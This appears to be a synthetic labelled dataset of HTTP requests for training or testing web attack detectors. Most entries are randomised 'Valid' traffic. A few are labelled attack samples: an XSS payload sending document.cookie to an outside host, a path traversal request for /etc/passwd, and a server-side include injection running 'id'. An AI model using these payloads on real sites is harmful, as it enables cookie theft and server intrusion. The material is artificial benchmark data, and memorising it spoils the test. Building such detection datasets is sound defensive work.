Host: 204.239.128.48:3696
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.8, identity;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 33.122.90.124
Cookie: ueoltnrie=6iRJi;admCnjEer5otoha=having;nreraEh1U3nt=eAurpwp-r]E
Cookie2: $Version="926"
Date: Wed, 02 Nov 05 01:29:03 GMT
ETag: "cR@krZP4Fect@PPa6kM0"
Expect: 100-continue
From: autmrtph@gdspioa8s.it
If-Modified-Since: Fri, 10 Nov 06 06:00:37 GMT
If-Unmodified-Since: Tue, 29 Jan 08 02:55:32 CET
If-Match: *
If-None-Match: *
If-Range: "maErYNNsfMqUsgb@rc6X"
Max-Forwards: 788
MIME-Version: 4.2
Pragma: diudberh='moeee'
Proxy-Authorization: cDsd5 tanae3ex=Nmchr
Authorization: diom hfoioe=rrah
Range: 17545-664
Referer: http://ntehi.gov/xtdile/CohInb.fgf
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: tyNu_3V http://www.phna6ots.st
UA-CPU: Sparc
UA-Disp: 940,210,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2873x022
Via: blHsn4/2.2 www.ipd9e.shtml, HTTP/3.5 192.18.7.40, 6.1 183.204.41.151
Transfer-Encoding: gzip
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 804 www.hpqoryti.css "Thqahnetlrepeoynn" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27125
Start - Id: 19754
class: Valid
GET /os/oonCs216eratle/vTWlqynS@Q3/huiacama0zsa3ov/9ddy/fnpIoq2s/-gl@B-C/eoyddaamig1jeh/DpF4oieicc8S3enTswsa/e8.cqEppnwWgtH-/suieHin51m/an.mspx? HTTP/1.0
Host: www.mef6Aie.uk:80
Connection: close
Accept: image/*;q=0.5, image/png
Accept-Charset: windows-1252, windows-1251, iso-8859-4;q=0.6, iso-8859-6;q=0.5, euc-kr
Accept-Encoding: compress;q=0.2, compress;q=0.6, gzip
Accept-Language: eqkejrhs-3ai5, t-cqgcdiax;q=0.0, rtthtphe-drea, yc-oaara;q=0.7
Cache-Control: no-store
Client-ip: 222.227.110.125
Cookie: tAn=~se dYmnctarguo;0d9jua1Z=98593;CUfTJSY=24
Cookie2: $Version="1"
Date: Thu, 03 May 07 14:34:14 CET
ETag: W/"K8j.PFB6aCrNVKbruSz"
Expect: 1nsRtee
From: epv6htre@qnue.fr
If-Modified-Since: Wed, 30 Mar 05 07:26:02 UTC
If-Unmodified-Since: Thu, 12 Mar 09 10:24:17 GMT
If-Match: "DSiURUzN6a6Pr-o"
If-None-Match: *
If-Range: "dTZnmmF0Ud0ykk-sD"
Max-Forwards: 60
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic YXJoc246ck1kcXFV
Authorization: Digest cnonce="hhnprav"
Range: 4774-
Referer: http://mEusrb8a.st/es1p3l/mihaisla/osesgNg/sejh/olhdn.dll
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/2.4 (compatible; Konqueror/4.0; Open BSD i386; ticaeEzo)
UA-CPU: x86
UA-Disp: 108,777,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3295x274
Via: FTP/0.0 www.ttodasx.htm, HTTP/2.7 5.174.213.131:54926, HTTP/3.1 183.150.49.176
Transfer-Encoding: compress
Upgrade: 4csi/2.2
Warning: 512 www.i7ae.js "unirUatcerwtt" "Wed, 21 Mar 07 20:14:54 GMT"
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19754
Start - Id: 16769
class: Valid
GET /djkepht4lyno/dOweoswbdeGiuf/wTO/oj1-EP2H/p91a/a6MQt1i1q8DL/0EV1pUhttps/TcY.l.wSCOEtelnet/siHakdpg6Tstibcda/nTsbD2mOspf/aOiinxtn1e0a3eam6iv/hJiipdeini.nsf? HTTP/1.0
Host: www.rsaoei.cz
Connection: keep-alive
Accept: image/*;q=0.1, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: udu-5nxiel;q=0.2, nogsTT-lzs, n-ty1On, Eese-aa;q=0.1
Cache-Control: no-cache
Client-ip: 101.13.96.212
Cookie: yoex=I';Dt6n=e;scsieiAtisoq=597;59n5oatf=rIIe s
Cookie2: $Version="8"
Date: Sun, 26 Dec 04 06:25:20 CET
ETag: "J-jyQUJFX5X5GVI"
Expect: 100-continue
From: tAgim@uoet.gov
If-Modified-Since: Fri, 27 Apr 07 11:51:42 UTC
If-Unmodified-Since: Tue, 01 Aug 06 09:14:29 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Oct 07 21:50:27 UTC
Max-Forwards: 7
MIME-Version: 0.6
Pragma: t='mcatE'
Proxy-Authorization: NTLM YWF3ZUVudHVkc0JvaGVodHN5d2V5OHNhcm9iZWVzbGE=
Authorization: e7Oett sehtEh=vnEeme
Range: 73855-,-7357
Referer: /ohmcVes/ynWhBs/j3eT/mwkukm/gjjhm.msf
TE: gzip;q=0.9,trailers,gzip;q=0.1
Trailer: Range
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 7.1; rv-ki; rv:4.4.6) Gecko/48671797
UA-CPU: PowerPC
UA-Disp: 9450,977,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8734x738
Via: FTP/4.5 www.ycb0ykoj.tiff
Transfer-Encoding: deflate
Upgrade: ret/6.5, tph/9.9, eiMan/0.4, qEir/6.9, 0be/8.7
Warning: 512 93.163.50.162 "gen9b" "Thu, 14 Oct 04 24:38:21 CET"
X-Forwarded-For: 38.253.106.148
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16769
Start - Id: 14407
class: Valid
GET /PDconnectGDgkGS0ZH_O9/iiee/Mupdate/tUC/DvnI-e/ofwWnON.HsMOl6/or/mtex.aspx?aeuebygket2r9=6o1it8nts&77rv=awz%5CG%3FisYrincludefr&oydeesk=+g%5C%3Etu HTTP/1.0
Host: www.eeEl43.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, x-mac-arabic;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 13.103.41.0
Cookie: nMy=h\null&n0beef:;sanhl=6;nrunmtpn=914;WU_TCDehknG=b5hdimgiaEmheGdut
Cookie2: $Version="479"
Date: Fri, 02 May 08 10:12:14 CET
ETag: W/"giup2LbAzDOVuQQqvsP"
Expect: srrptge
From: Rt7eei@haruek9a0.st
If-Modified-Since: Wed, 17 Mar 10 07:02:59 CET
If-Unmodified-Since: Tue, 02 Oct 07 09:23:36 GMT
If-Match: "EzO9PheSoHxh2-4fn"
If-None-Match: *
If-Range: Tue, 11 Jan 05 01:13:57 GMT
Max-Forwards: 43
MIME-Version: 0.0
Pragma: m='n95zakna'
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: xdtau tda4=OtsEo3
Range: -5585
Referer: /csns.php
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/4.8 (compatible; Konqueror/4.3; Solaris; eIthsrsare; nnedt)
UA-CPU: StrongARM
UA-Disp: 769,941,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9340x0516
Via: 7.2 www.wur8z.htm, FTP/4.6 63.62.19.229
Transfer-Encoding: compress
Upgrade: iidn/5.9, wiont/0.5
Warning: 995 www.tyeo.tiff "emterf" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14407
Start - Id: 29505
class: Valid
GET /eMRSVU_/cZo0j8/l2eihm/nGkTC@C5vvp2VYCB_wmI/lQdivasIv/bpriWtpUti/elhaoti1dee6m3.dll?jstiiijk=ac%3Emi&eoYtsrcereEr8t=inrtedcylai&eehahiVr=Jt&osekiegdesd=8&hrxi=ucL&WuCGeE7QE=7bfsict&FEchildjXV=4ipn&ilmVczar6cetTfl=img%7Ct&eml3e=AfbTnOIshwnr&trDfewel=ocuowmnahmtjyio&raene=ur&ogimeybft6Ae2db=%26xterm0k&fhoit=mdbinen%40%29miY5&65o9zE=e HTTP/1.0
Host: www.sswdg.biz
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: miRevuer-ohn1syn;q=0.8, yy2elxeA-ctct1eoy;q=0.3, t-llhije;q=0.0
Cache-Control: only-if-cached
Client-ip: 215.49.238.10
Cookie: 9Urj2=763345692;ohstzocui=tieTsrdml0ihu6nTaL
Cookie2: $Version="237"
Date: Wed, 13 Jan 10 07:19:35 GMT
ETag: W/"6MeY5OzJtp5Cza3Fnr"
Expect: 100-continue
From: mv60oy@frtpeenv.biz
If-Modified-Since: Mon, 27 Nov 06 13:39:31 GMT
If-Unmodified-Since: Mon, 24 Jan 05 24:01:00 UTC
If-Match: *
If-None-Match: *
If-Range: "KXJmTmY2010wbOX"
Max-Forwards: 6
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: 40goe uren9esp=e5th
Authorization: Digest qop=dnht3
Range: 251-31,847-,2-
Referer: http://8oeputee.cz/TztAoo/m9et/aeweR.mdb
TE: gzip;q=0.3,deflate,chunked;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.0 (compatible; npdu0hr; Unix; nIhc; zeSEoer2e)
UA-CPU: Sparc
UA-Disp: 103,9341,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 641x2619
Via: 1.0 www.reueiP.js
Transfer-Encoding: deflate
Upgrade: nene/2.6
Warning: 369 www.wbAesst9.html "c8gOtonht" "Fri, 11 Sep 09 04:28:00 UTC"
X-Forwarded-For: 1.97.153.134
X-Serial-Number: 801273405
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29505
Start - Id: 26171
class: Valid
GET /lawc.jpeg?RneJ5lc=dgent&ht=aT9A_dei5&sj=391&iial6lhDnvfR2=nnv%3Aonhn2nig&HyFz=iunNse&ppcesetfhilxN=nlae%2FN%3B3dropntg&rsdln=+&tqqnneq=tnTJ09ICG1e8&usitosrHsephady=t4SS7&sqCt8hEhIoshoro=hU9tljnoeertn&cwamrieoesoi=nwa7eusEu HTTP/1.1
Host: www.mmqkf.fr:80
Connection: eTrrDa
Accept: video/quicktime;q=0.4, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.2, identity;q=0.7, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 2.25.83.104
Cookie: ccor9annt=rne+ie9nullrt;ur=pt$n;ED-https3=aif
Cookie2: $Version="949"
Date: Sat, 18 Sep 04 24:10:00 UTC
ETag: "DYofgNrQvLsWcob"
Expect: 5w5dueI=iiot
From: k64yl@itTpiyl.org
If-Modified-Since: Sun, 04 Sep 05 16:08:02 GMT
If-Unmodified-Since: Fri, 29 May 09 10:09:10 GMT
If-Match: "BvDzRMc3@QmCjRIUn"
If-None-Match: "AIWa6ONTWH_rpfeo"
If-Range: Sun, 14 Jun 09 19:34:32 UTC
Max-Forwards: 35
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="renotae"
Authorization: Digest opaque="Gonohwud"
Range: 18-
Referer: /nsias/e4tf/dfntdeo/eapSdh.png
TE: trailers,gzip;q=0.8
Trailer: TE
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 4.5; he-o0; rv:9.3.5) Gecko/02382631
UA-CPU: x86
UA-Disp: 048,473,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7580x3767
Via: e0tier/4.8 185.152.184.72
Transfer-Encoding: gzip
Upgrade: sbthb/1.3, ctm/5.8, jMsOp/9.9, 0wrop/6.2, 2uaa1/2.7
Warning: 091 41.251.186.23 "rRst8cre" "Sat, 21 Feb 04 24:26:15 GMT"
X-Forwarded-For: 102.26.95.103
X-Serial-Number: 77624336
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26171
Start - Id: 48012
class: XSS
GET /tepeitmlo8ulpn5/n@2TJ92SKgId/toeEia/hpzgh/x6GULshutdownsam.png?HpiHexacg=8&BTxf67=pwaseniAndacn&naei=%3C%21%5BCDATA%5B%3C%21--%5D%5D+%3E%3Cscript%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.meriil.com%2Fcgi-bin%2Ftensolin.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E HTTP/1.1
Host: 83.0.255.82:80
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.4, gzip;q=0.9, identity;q=0.7, gzip
Accept-Language: *
Cache-Control: glitbcuY='arah'
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="4"
Date: Fri, 09 Mar 07 23:37:47 UTC
ETag: "mJXtu2Cs.k@CXBnl"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 19 Sep 08 05:30:21 UTC
If-Unmodified-Since: Sat, 29 Sep 07 21:16:05 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Aug 04 07:13:52 UTC
Max-Forwards: 1
MIME-Version: 5.8
Pragma: 2ne0='sltYoe'
Proxy-Authorization: NTLM NnJhc2lkbGhldzBvZWFkcDRlYW5zdWVuaWF0c0xuaGdnZXBob28=
Authorization: NTLM eTZwZGVlM1M3TTdpYm5pYWV0b3R1cmR0Q2VvaXJhcXNscnRBTmg=
Range: 5-,0-4,-81
Referer: /1bHyo.js
TE: trailers,deflate;q=0.2,trailers
Trailer: User-Agent
User-Agent: dEet0ga48odee
UA-CPU: MIPS
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9754x5278
Via: tsjt3e/1.5 210.163.207.149, ejc/3.5 www.cht5ts5.png:0134
Transfer-Encoding: gzip
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48012
Start - Id: 4186
class: Valid
PUT /oFgrEi8_OZEKp6Y/tl_MZEfZsXGn7R_sD1K/msduwgetgFi/HWKTTGhUlink/dewuGOQSX6passthruGy/QZLps6/gNWxrD4IwtWM3fG.nsf? HTTP/1.0
Content-Length: 295
Content-Language: ltf
Content-Encoding: gzip
Content-Location: /aUres/uObcdpk/v6dSfial/uo9yOoo.php
Content-MD5: cmNsYmpkeTZpZDVNZW96Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Aug 07 21:36:31 UTC
Last-Modified: Mon, 20 Jun 05 03:09:14 GMT
Host: www.rTiaaeq.ch
Connection: o8rh
Accept: image/*;q=0.4, image/gif
Accept-Charset: windows-1253;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 41.163.178.133
Cookie: cwn8niTaE= m?tt534SL+
Cookie2: $Version="908"
Date: Sun, 07 May 06 21:29:28 CET
ETag: "pJmbnW9Nar64.yXK2Wl"
Expect: 6xsMd
From: aamse8@eaazpr.org
If-Modified-Since: Sun, 11 Jan 04 18:44:13 CET
If-Unmodified-Since: Tue, 20 Nov 07 11:47:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM dG50MDJhc3RyZFloY25leXRlU2Fqc3RoZjZhckdLdGphaXd0NzRjZWlhcng=
Authorization: Digest uri=/efehhae/ttd7/1hngzU/aecdGstl.wmn
Range: 6-,-5947,21-
Referer: /n8qEm/esethlfw/eedua0qn/rahsahio.mpeg
TE: trailers,trailers,deflate
Trailer: Referer
User-Agent: ogia (tdHYFaxc; eYh-YQ; 0U4d-izlwm; g5K.RNCs8Y; x37igQ)
UA-CPU: x86
UA-Disp: 1201,427,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 878x990
Via: HTTP/2.5 www.selh.tiff, 2.6 www.sd17uazt.shtml, 2.6 235.190.224.118
Transfer-Encoding: identity
Upgrade: tIxs/2.9, corczi/8.6
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1g=VERhtelnet2Ediscripte2terrlp&OiooNme3e=tq8m&iftwiiasreipm=cmdeeie&za9t=069601629&Pdbhx=oabG7arotat&7lo=h@&ileegntdwTHt=meta&oiobjectdhxaX5&TFM3=tealiuveekxeiu34&shhtvs6=i ors7ctmpeu&oyayoQer4hasl=ima6ecdd8aph&dei0ua7t=nttoolteb&seNrmTuig=moxml&lstn=a?vunionwgethd Lir3un&ursssvae8=10830

End - Id: 4186
Start - Id: 21282
class: Valid
GET /miZQV7.2J8wKPLAzFN.sh?ns4nnemndn=963&0JWsm=o0nHANf1XQUm&lkruc=echo%7Ewhxwi&bbLniooyeEs67se=7wlla&eaxarhoth=its&f9Smfarypnehan=tw&qoEYGP0@=105128&7mlxyuhortn=jaitaersstnea&8neernhqnseii6=29XmTlsv1n&6xoooeaaorhsoe=rNrprtaLOter&emrhluinm=porefn HTTP/1.0
Host: www.9ubae.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=4571
Client-ip: 83.86.54.168
Cookie: EaairlceD=4110194;qoe3pnpas=iesinnsreeSivA;0YTRC=2;n7lmD4jesf3h=rlhdhnBcs(;0Rnsr=t3bart4ohhtEa;qloiife=na(aeuid6nhyid sn
Cookie2: $Version="57"
Date: Mon, 02 Jul 07 11:15:38 GMT
ETag: W/"rifyxFpOIZsUHN."
Expect: hOsusai=daoao;7tesylm=de1l
From: dio0@laae5ent.cz
If-Modified-Since: Mon, 27 Sep 04 10:53:50 CET
If-Unmodified-Since: Wed, 16 Dec 09 17:58:01 GMT
If-Match: "oAJR50bR4F550eVUJ"
If-None-Match: "bGswsXAAmCClPESaVQJ"
If-Range: Mon, 09 Feb 09 02:33:58 GMT
Max-Forwards: 5151
MIME-Version: 6.6
Pragma: iih=vkerwi0t
Proxy-Authorization: Digest qop=auth
Authorization: Digest opaque="9eainrri"
Range: 01887-
Referer: /H9csi7.php3
TE: gzip
Trailer: TE
User-Agent: wUt8BAG@ http://www.seitg.be
UA-CPU: PowerPC
UA-Disp: 552,365,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 714x7693
Via: FTP/6.3 www.aeadeIW.png, 9.2 www.Snlfs3.jpg
Transfer-Encoding: deflate
Upgrade: 2ddi/6.3
Warning: 031 41.122.125.127:7076 "Eiaoenuons" 
X-Forwarded-For: 172.206.4.103
X-Serial-Number: 900444
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21282
Start - Id: 46213
class: PathTransversal
GET /rxOetdtcfmn.bin?mzeeesZrxnyraue=nwmgOCRv&pblessr0T=%2Fetc%2Fpasswd&EceltnRc=openixterm2n4%5Cqte%5CAPm&pdlreAs=5560283 HTTP/1.1
Host: 71.180.175.160
Connection: niusgE
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sHQyntw-axsni;q=0.3, rRinm-eik6T, dq9-cs8;q=0.5
Cache-Control: min-fresh=352
Client-ip: 244.185.69.193
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="6"
Date: Wed, 05 Oct 05 11:58:37 UTC
ETag: "lyp56_QbpqgxD-1"
Expect: ecm6rrof=7aeoed
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Fri, 06 Mar 09 22:45:35 CET
If-Unmodified-Since: Sat, 22 May 04 20:10:51 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Apr 08 09:49:52 UTC
Max-Forwards: 8
MIME-Version: 5.5
Pragma: irO='cxcr'
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic aDBlczptaWU5aQ==
Range: 63-8582,2-821656
Referer: http://tonhde.uk/lmlp.zip
TE: chunked,trailers
Trailer: Date
User-Agent: sdjbeeb2e3ytoenz
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6581x3968
Via: qhh/8.1 23.121.86.177:2189, rnu/1.6 209.151.91.137:296
Transfer-Encoding: aLnyd
Upgrade: ehv8/6.5
Warning: 048 www.olNtt.tiff "8Oh4bg22euilahgn" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 79986231728889
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46213
Start - Id: 25778
class: Valid
GET /ao1sj4AhSoK1sL00t/dwgtIooeecrtoaIuil/rva/lereplace3Vn5U8Td/dp2io4lr/sabumeaqd5iaedbhctt/ubN/osNn_l/zhuD4xandf/iehd/X1B/o8of.shtml?o1tee=nna%27include&eI=8teht&th=651&oSu8hoaxeslt=dwqaCefypI&mabicz=d%2F%2Bir&frstthoetpgo=N8i&qruenhbo=gprocessing-instructionedheandaaonf&fes=00038&issnTcb1rte0Uda=oog7hen&hz=hCZ9o2i9 HTTP/1.1
Host: 35.9.119.87
Connection: keep-alive
Accept: audio/basic
Accept-Charset: windows-1254;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=1046
Client-ip: 20.96.248.211
Cookie: VAf5cjXQ=knMltcsrI;b3earHbR=3313260
Cookie2: $Version="788"
Date: Sat, 12 Jul 08 23:09:21 UTC
ETag: "TkphxNdlE_AQ8J5ftEjn"
Expect: 100-continue
From: llantq@at3ooty.biz
If-Modified-Since: Fri, 12 Jan 07 02:11:43 CET
If-Unmodified-Since: Wed, 22 Mar 06 03:07:46 GMT
If-Match: "2GDNiF1Ssw_bGhPA0"
If-None-Match: "8@8uzEzXkBBf4f5rr"
If-Range: *
Max-Forwards: 46
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: Digest qop=auth
Range: -02113
Referer: /t3mee/isSl.asmx
TE: trailers,chunked
Trailer: Warning
User-Agent: sirmii/3.4.4.9.4
UA-CPU: Sparc
UA-Disp: 9911,6209,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: ntny/6.8 www.ooAfEs.jpg, HTTP/1.0 187.21.110.110, 69sa/9.4 195.33.209.188:4423
Transfer-Encoding: deflate
Upgrade: wqn/1.7, nvnp/4.1
Warning: 928 4.71.150.181 "eif2TenhunoLoU" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25778
Start - Id: 40172
class: SSI
GET /synyzieayaeeo.jpg?7a9jxsystem@-=%3C%21++++%23%3C%21--++++%23exec++++cmd%3D%22id%22--%3E&r1yino9rOrr=dhj&fo=q%26y2&CIwHaZ=nmasse%5CH HTTP/1.0
Host: 167.43.245.156
Connection: ye27no
Accept: audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: usfrr='tala8wn'
Client-ip: 34.79.0.86
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="360"
Date: Sat, 10 Jun 06 19:59:58 UTC
ETag: W/"k_aCPWy5XqeILlOdj5S"
Expect: GH1D
From: min0e4tn@ehtETuft.cz
If-Modified-Since: Tue, 26 Jun 07 22:42:22 UTC
If-Unmodified-Since: Wed, 01 Apr 09 15:43:32 CET
If-Match: *
If-None-Match: "1X-LJfWF9XstIzg0jdi"
If-Range: Wed, 30 Aug 06 04:36:55 GMT
Max-Forwards: 9
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: tsnral ysei=dtieashn
Range: 85-
Referer: http://errea.uk/mhcrmar/bNawo/reUkr/1oyhtAm/edm4eAa.dll
TE: trailers
Trailer: Warning
User-Agent: tteqnM9atsl
UA-CPU: StrongARM
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 427x7361
Via: 9.8 154.53.61.146, vtgnCf/5.0 124.110.72.52:0537, 5.0 205.206.178.248:5
Transfer-Encoding: wseh
Upgrade: jil/6.4, nmatei/2.7, 8mb/9.3, iejhA/3.6
Warning: 617 www.aa0efg.png "i7eeeyweupihp0u" 
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40172
Start - Id: 13426
class: Valid
GET /eD/4i/Xrtgant0ehtohgiopeu/rhteLWryet5Csohjao/insnEIW@6JjV3F/83Ssjlgbfofu45T/tjQMyXFbjlveam/raafkdSdlwdtthsAx/mtomieddhlkge/tX/elmQsmngxXe/eeetsaoomu0riuspor.msf?oumxpelryrtumb=i9jWmOVH6&44mtppnoietibn=r82%40ZB&G2.DkyY=0d&eiha0yn=rzxvIXcf&rtttuhPrA=%3D1locationb&sE8r1t5tox7hft=jqKT2yKOlPra&4VIFbmcH=48167&nCt3iehAd7leo=390440&ze=kdavzjdenandita&39rahdooMsddt=otMRtCgg0Fk%40&edm6rsoX5rGo=%26s HTTP/1.1
Host: 39.75.109.24
Connection: close
Accept: audio/basic, image/*;q=0.8
Accept-Charset: us-ascii;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 148.219.86.208
Cookie: a8geeloN35anoMi=eo;USYJhN6Rwinntid3=1uh_-T9Rq;ehOmndtlvaba=eiE4mosuevalwinnt>e
Cookie2: $Version="886"
Date: Sat, 11 Apr 09 14:57:49 GMT
ETag: W/"cAVI@vuiXnK-wTp8"
Expect: 100-continue
From: mofh@F9slaieWr.com
If-Modified-Since: Sun, 02 Jan 05 02:14:07 CET
If-Unmodified-Since: Wed, 14 Jan 04 04:51:15 CET
If-Match: *
If-None-Match: "P292SVXsezqNrLAiVsO"
If-Range: *
Max-Forwards: 6
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM a3NlZ2x3c3NBYXRNaHcwZW9oclVjZTZvYVRpaWhJY2FrbWVldHB3c3N1c3RzdGVk
Range: 7322-
Referer: http://www.sdLc.uk/ksydep2b/Ot0smb.avi
TE: gzip;q=0.7,deflate
Trailer: If-Unmodified-Since
User-Agent: ekrhr/9.4.6.1.8
UA-CPU: x86
UA-Disp: 507,141,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 661x4416
Via: 3.8 85.122.25.142, FTP/5.3 www.rdr8s1oo.js
Transfer-Encoding: identity
Upgrade: 9ItrTa/4.9, sege/5.6
Warning: 040 www.md2Oee7.html "8eDFiNdsrzhsqhjpn7d" 
X-Forwarded-For: 220.88.204.10
X-Serial-Number: 8913868514720115974
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13426
Start - Id: 18291
class: Valid
GET /Eo9_ordocumentadminwd@MB/4PSlzoazUIBOOjee7-GN/r1mrlsWbNopencAKv4/eUrf@FeqIkhLKAlYanPh.mspx?I0X3http2v=%3A&eXeUi=eh+%3Dp&vo=ice&Aerrcsinwo6bfe=arzA2H&Rvypdrp8=w%29ahOsde%25wp-oebi&ahfezd=sf7e&tPcP=ast-rN05ltT&hoe4=gSVp5%40ulhi&4ur7se=62&akihach=955047720&8doeeGhb3u=yhsmt&tihaat8tEkepwt=arhA20dterhystIo&vbscriptZ0LBuliblinkaQ=e8 HTTP/1.0
Host: 43.27.236.238
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese, cp-950, iso-8859-9, hz-gb-2312;q=0.6, iso-8859-15
Accept-Encoding: 
Accept-Language: eySo-j8Adteb, l-Ac;q=0.1, 32l-lFmnie;q=0.6
Cache-Control: max-stale
Client-ip: 71.143.27.9
Cookie: dapIicprRosn0=2;Eeistr=j-wbdQnh
Cookie2: $Version="49"
Date: Thu, 29 Dec 05 05:55:34 CET
ETag: "kHNThTU5VnqCTv."
Expect: er8Rh
From: tdgpai@cdetEa3.uk
If-Modified-Since: Sat, 21 Mar 09 01:48:43 CET
If-Unmodified-Since: Fri, 07 Aug 09 19:57:52 GMT
If-Match: *
If-None-Match: *
If-Range: "I7W-k2dWRgcbPyxO"
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: oezd gpzri=1vzeoha9
Range: 55116-
Referer: /EesohuDu/O7Hc/2r2n/ot3e.php
